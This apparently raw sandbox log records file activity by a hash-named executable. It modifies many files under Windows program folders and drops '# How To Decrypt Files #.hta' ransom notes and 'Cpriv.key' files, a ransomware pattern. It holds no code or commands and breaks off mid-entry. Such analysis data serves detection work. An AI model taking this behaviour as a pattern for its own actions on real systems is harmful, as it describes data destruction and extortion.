de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14711_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187895.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00683_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSTORE.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OriginResume.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_alignright.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\OLADD.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\WatchOut.clr de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103402.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR41F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105360.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21548_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\OUTEX.ECF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01245_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_scrapbook_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts2.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\or\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03466_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18184_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15173_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_italic.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099200.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15169_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusDoNotDisturb.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsnld.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Folders\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00443_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Response.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\RICEPAPR.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09031_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\IRIS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01636_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00736_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00241_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Civic.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Premium.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\oledbjvs.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-api-visual.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_travel_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OrielLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Mail\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Discussion.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RECS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\tr.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01251_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00190_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Icons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL022.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21314_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0290548.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00487_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification 